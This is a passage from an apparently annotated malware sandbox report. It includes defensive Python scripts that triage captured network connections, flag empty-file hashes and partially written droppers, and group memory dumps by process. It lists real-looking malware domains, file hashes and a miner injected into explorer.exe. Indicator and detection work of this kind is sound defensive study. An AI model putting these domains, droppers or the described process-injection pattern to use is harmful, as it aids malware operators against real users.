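        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return rows

def triage(rows, repeat_threshold: int = 10):
    """Collapse the rows into distinct TCP endpoints with counts and tags, plus queried-only names."""
    queried, counts = set(), Counter()
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53:
            if not r["domain"].endswith(".in-addr.arpa"):   # reverse lookups carry no intent
                queried.add(r["domain"])
        elif r["proto"] == "tcp" and r["ip"] != MDNS_GROUP:
            counts[(r["ip"], r["port"], r["domain"])] += 1
    endpoints = []
    for (ip, port, domain), n in sorted(counts.items()):
        if domain in BROWSER_NOISE:
            continue
        tags = []
        if not domain:
            tags.append("direct-ip")            # connected without any name resolution in the capture
        if port not in STANDARD_PORTS:
            tags.append("nonstandard-port")
        if domain in LEGIT_HOSTING:
            tags.append("legit-hosting")
        if n >= repeat_threshold:
            tags.append("repeated")             # many connections to one endpoint: polling or beaconing
        endpoints.append({"ip": ip, "port": port, "domain": domain, "count": n, "tags": tags})
    connected = {domain for (_, _, domain) in counts}
    return {"endpoints": endpoints, "queried_only": sorted(queried - connected)}

if __name__ == "__main__":
    result = triage(parse_rows(SAMPLE_NETWORK_TABLE), repeat_threshold=3)
    for e in result["endpoints"]:
        print(f"{e['ip']:>16}:{e['port']:<6} {e['domain'] or '-':24} x{e['count']:<3} {' '.join(e['tags'])}")
    print("queried but never connected:", result["queried_only"])
```

On the full table the queried-only set is the interesting residue: s.lletlee.com is resolved repeatedly and marisana.xyz, music-sec.xyz and sanctam.net once each, with no TCP connection following, which is what a sinkholed, unregistered or not-yet-live domain looks like in a capture. The repeat threshold is an assumption; ten is low enough to catch live.goatgame.live here and high enough to skip a browser's handful of connections to one CDN.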
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 093083fdf334a5df443ff99547828ae3 |
| SHA1 | 850820ccb5dac80a488fda6314d2c9608665d28f |
| SHA256 | c5ad98b39662604374e6bb3062d3074fbb3aeb019ae618e3432a4a20bd15df96 |
| SHA512 | 1ef373ca706f2126cf92a6161453092450438dc505d4e2070f6f1709b39b3d93f12ec375219d781a8ce006fbfa10542581f642c63d8753675734256f7f38527d |
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 994d04287d79729d0d51755455ccac6c |
| SHA1 | 155bdf22c7e3dbc44095c3183a097898a788dfbc |
| SHA256 | a787d7498fe858f2e24f7084720cee0fefb0630244962eae897f5bc0877e054c |
| SHA512 | a50211ae1cfede7c55e7117555efa1753cd6c75400a743e86352b1f757a7ac65285523a7ba8611a3ffc4338c27ee10fe89f8bb3746bd14968152d1d9d6fa2563 |
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 3cbb17dd1b89c5e7b56450e0d8b2c448 |
| SHA1 | 8f0319862c3dcd567fb9f8ff725d8fc4bab87dd3 |
| SHA256 | 7ff88838f8958378526b4150d40cb4de26470e3fa1990c838a689a5172b00681 |
| SHA512 | 62998f303ae386c28bfbecb4558c6b46400327369551b69f59dacb7b32b491889ffec840d100b0dc4d75bffe4f07bad3dd72b5436c404b07ebfcff70f7424faf |
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe
| MD5 | 22aedcbfd9a9fa6ecdc6ab3023758197 |
| SHA1 | 3c9355a168b79559e5e72408ff3648f7908b87b5 |
| SHA256 | d9588ce55ad638cb03668b358d4040385e70512ca487279c3852450e421b0107 |
| SHA512 | 42e4d05565fc366d486a619657f8549beb9d9b4c799451657654dcdb955f304c061d7a3fef8e3ebedaa6e1b6dffa0c93d1fac7040c0ad415dfd2abacbef29ee6 |
memory/2544-43-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2544-48-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2544-54-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4408-84-0x00000000002D0000-0x00000000002D8000-memory.dmp
memory/2220-109-0x0000000000D30000-0x0000000000D5E000-memory.dmp
memory/2220-116-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp
memory/2220-114-0x00000000014F0000-0x00000000014F6000-memory.dmp
memory/2220-118-0x0000000001500000-0x0000000001522000-memory.dmp
memory/4368-120-0x0000000073000000-0x00000000737B0000-memory.dmp
memory/2220-123-0x0000000001520000-0x0000000001526000-memory.dmp
memory/4896-121-0x0000000005D10000-0x0000000005DAC000-memory.dmp
memory/4896-122-0x0000000073000000-0x00000000737B0000-memory.dmp
memory/4896-125-0x0000000005B10000-0x0000000005B20000-memory.dmp
memory/2220-133-0x000000001BAF0000-0x000000001BB00000-memory.dmp
memory/3856-142-0x0000000000AD0000-0x0000000000AE0000-memory.dmp
memory/3716-152-0x0000000002260000-0x0000000002344000-memory.dmp
memory/4368-154-0x0000000073000000-0x00000000737B0000-memory.dmp
memory/1032-158-0x0000000000400000-0x000000000334B000-memory.dmp
memory/4940-166-0x0000000000400000-0x00000000004E4000-memory.dmp
memory/2784-169-0x0000000000400000-0x00000000032F8000-memory.dmp
memory/2544-172-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2544-173-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2544-179-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2544-178-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3856-176-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp
memory/2544-175-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2544-170-0x0000000000400000-0x0000000000A11000-memory.dmp
memory/2784-141-0x00000000001C0000-0x00000000001C9000-memory.dmp
memory/2784-137-0x0000000003420000-0x0000000003520000-memory.dmp
memory/1032-135-0x0000000003420000-0x00000000034BD000-memory.dmp
memory/1032-134-0x00000000035C0000-0x00000000036C0000-memory.dmp
memory/4408-124-0x000000001AFF0000-0x000000001B000000-memory.dmp
memory/4896-119-0x0000000005A50000-0x0000000005A5A000-memory.dmp
memory/4896-117-0x00000000059B0000-0x0000000005A42000-memory.dmp
memory/4896-115-0x0000000005F60000-0x0000000006504000-memory.dmp
memory/4896-113-0x0000000000FB0000-0x00000000010F2000-memory.dmp
memory/4896-180-0x0000000003210000-0x0000000003222000-memory.dmp
memory/4408-108-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp
memory/4368-106-0x0000000000940000-0x0000000000A2E000-memory.dmp
memory/2544-53-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2544-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2544-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2544-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2544-49-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2544-46-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2544-47-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2544-45-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2544-44-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2544-42-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libstdc++-6.dll
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe
| MD5 | 0c1daf8441a91d34da49707c8aee0902 |
| SHA1 | cb5e5ccfaf253ab657f23b2c18f9061997f380d9 |
| SHA256 | df9d05706f4169d2ba56250751d9a5233bb3aa7909cdc15a5ea4ae528e74dc29 |
| SHA512 | f68ccdef48a7af745297d9150cffa9937a2282c66ff6d37023dd8cd2225f740bf051b11e7af156f15219b9dc11f7df6babd8f1a9de619724212d74cbf11acd84 |
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe
| MD5 | a58f43f901088dfa7576e1976c85eccb |
| SHA1 | 3883572f5370f0e96f089ce94813d7d852c224de |
| SHA256 | 019f2db0c2bfce02d7710e4d540b755d580d7b65a51b85761cef08f75d0f674f |
| SHA512 | 203702cc19d43b4ebcb0be7b78e7690b10be6f168528cfde7d2f63fca51233eded1093e4f968ac0ef2b9814343314f0caf4737e328c4ee07c5a17d57a18a5357 |
memory/4408-190-0x000000001AFF0000-0x000000001B000000-memory.dmp
memory/3856-192-0x0000000001900000-0x000000000190E000-memory.dmp
memory/3856-194-0x000000001CFD0000-0x000000001CFE0000-memory.dmp
memory/3856-193-0x00000000030E0000-0x00000000030F2000-memory.dmp
memory/3956-207-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp
memory/3856-208-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp
memory/4896-209-0x000000000BE80000-0x000000000BF0C000-memory.dmp
memory/4896-210-0x000000000E010000-0x000000000E02E000-memory.dmp
memory/4896-215-0x0000000073000000-0x00000000737B0000-memory.dmp
memory/4120-217-0x00000000059F0000-0x0000000006008000-memory.dmp
memory/4120-220-0x0000000005440000-0x0000000005452000-memory.dmp
memory/1060-226-0x00000000050E0000-0x0000000005116000-memory.dmp
memory/4120-227-0x00000000054E0000-0x000000000551C000-memory.dmp
memory/1060-228-0x00000000057D0000-0x0000000005DF8000-memory.dmp
memory/3956-230-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp
memory/1060-235-0x0000000005FA0000-0x0000000006006000-memory.dmp
memory/1060-241-0x0000000006010000-0x0000000006076000-memory.dmp
memory/4120-246-0x0000000005800000-0x000000000590A000-memory.dmp
memory/1060-247-0x00000000062F0000-0x0000000006644000-memory.dmp
memory/1060-249-0x0000000006670000-0x000000000668E000-memory.dmp
memory/1060-234-0x0000000005E00000-0x0000000005E22000-memory.dmp
memory/4120-231-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/4120-229-0x0000000005520000-0x000000000556C000-memory.dmp
memory/1060-225-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/1060-222-0x0000000073000000-0x00000000737B0000-memory.dmp
memory/4120-216-0x0000000073000000-0x00000000737B0000-memory.dmp
memory/1060-283-0x000000007FB70000-0x000000007FB80000-memory.dmp
memory/1060-295-0x0000000006C30000-0x0000000006C4E000-memory.dmp
memory/1060-297-0x0000000007880000-0x0000000007923000-memory.dmp
memory/1060-296-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/1060-285-0x00000000739B0000-0x00000000739FC000-memory.dmp
memory/1060-284-0x0000000007640000-0x0000000007672000-memory.dmp
memory/4120-211-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3752-398-0x0000000002670000-0x0000000002690000-memory.dmp
memory/3752-397-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-401-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-403-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-404-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-402-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-399-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-395-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-393-0x0000000140000000-0x0000000140786000-memory.dmp
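Two things in the Files section are easy to miss when reading hashes by eye. The digests listed for libstdc++-6.dll (MD5 d41d8cd98f00b204e9800998ecf8427e, SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709, SHA256 e3b0c442...) are the digests of zero-byte input, so the file was empty when the sandbox captured it and those values identify nothing. And setup_installer.exe and setup_install.exe each appear several times with different hashes, which is what a file looks like when it is snapshotted while still being written; only the last hash of each is a usable indicator. The memory dump names encode PID, snapshot number and address range, so they can be grouped per process: PID 3752 (the explorer.exe that runs the miner arguments) has an image-sized region at 0x140000000, the default x64 link base, captured repeatedly. The script below is an added example (not part of the report) that parses a constructed subset of the section and performs those checks; the section format it assumes is the path line followed by hash rows, as printed above.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample: a subset of the Files section above, in the report's own layout.
SAMPLE_FILES_SECTION = r"""
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 093083fdf334a5df443ff99547828ae3 |
| SHA1 | 850820ccb5dac80a488fda6314d2c9608665d28f |
| SHA256 | c5ad98b39662604374e6bb3062d3074fbb3aeb019ae618e3432a4a20bd15df96 |
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 994d04287d79729d0d51755455ccac6c |
| SHA1 | 155bdf22c7e3dbc44095c3183a097898a788dfbc |
| SHA256 | a787d7498fe858f2e24f7084720cee0fefb0630244962eae897f5bc0877e054c |
memory/2544-43-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libstdc++-6.dll
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
memory/1032-158-0x0000000000400000-0x000000000334B000-memory.dmp
memory/3752-397-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-401-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3752-398-0x0000000002670000-0x0000000002690000-memory.dmp
"""

MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")

# Computed rather than hard-coded so a typo cannot creep into the comparison.
EMPTY_DIGESTS = {name: getattr(hashlib, name.lower())(b"").hexdigest()
                 for name in ("MD5", "SHA1", "SHA256", "SHA512")}
DEFAULT_X64_IMAGE_BASE = 0x140000000   # MSVC default /BASE for 64-bit executables
DEFAULT_X86_IMAGE_BASE = 0x400000      # MSVC default /BASE for 32-bit executables

def parse_files_section(text: str):
    """Return (files, dumps): files are {path, hashes}, dumps are {pid, snap, start, end}."""
    files, dumps, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            dumps.append({"pid": int(m[1]), "snap": int(m[2]), "start": int(m[3], 16), "end": int(m[4], 16)})
            current = None
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current["hashes"][m[1]] = m[2]
            continue
        current = {"path": line, "hashes": {}}     # any other line starts a new file entry
        files.append(current)
    return files, dumps

def empty_files(files):
    """Paths whose every listed digest equals the digest of zero bytes."""
    return [f["path"] for f in files
            if f["hashes"] and all(EMPTY_DIGESTS.get(alg) == h for alg, h in f["hashes"].items())]

def rewritten_paths(files):
    """Paths recorded with more than one SHA256: partial-write snapshots; keep the last one."""
    seen = defaultdict(list)
    for f in files:
        if "SHA256" in f["hashes"] and f["hashes"]["SHA256"] not in seen[f["path"]]:
            seen[f["path"]].append(f["hashes"]["SHA256"])
    return {p: hs for p, hs in seen.items() if len(hs) > 1}

def summarize_dumps(dumps):
    """Per PID: distinct regions with size, how many snapshots covered them, and base-address tags."""
    regions = defaultdict(lambda: defaultdict(int))
    for d in dumps:
        regions[d["pid"]][(d["start"], d["end"])] += 1
    summary = {}
    for pid, regs in regions.items():
        summary[pid] = []
        for (start, end), n in sorted(regs.items()):
            tags = []
            if start == DEFAULT_X64_IMAGE_BASE:
                tags.append("default-x64-image-base")   # a PE mapped at its link base, e.g. a manually mapped payload
            if start == DEFAULT_X86_IMAGE_BASE:
                tags.append("default-x86-image-base")
            summary[pid].append({"start": start, "end": end, "size": end - start, "snapshots": n, "tags": tags})
    return summary

if __name__ == "__main__":
    files, dumps = parse_files_section(SAMPLE_FILES_SECTION)
    print("empty:", empty_files(files))
    print("rewritten:", rewritten_paths(files))
    for pid, regs in summarize_dumps(dumps).items():
        for r in regs:
            print(f"pid {pid}: 0x{r['start']:X}-0x{r['end']:X} ({r['size']:#x} bytes, {r['snapshots']} snapshots) {r['tags']}")
```

The base-address tag is a hint, not a verdict: a region starting at 0x140000000 inside explorer.exe is consistent with a 64-bit PE written into the process, which fits the report's WriteProcessMemory signature and the miner arguments on that process, but confirming it means dumping the region and checking for a PE header.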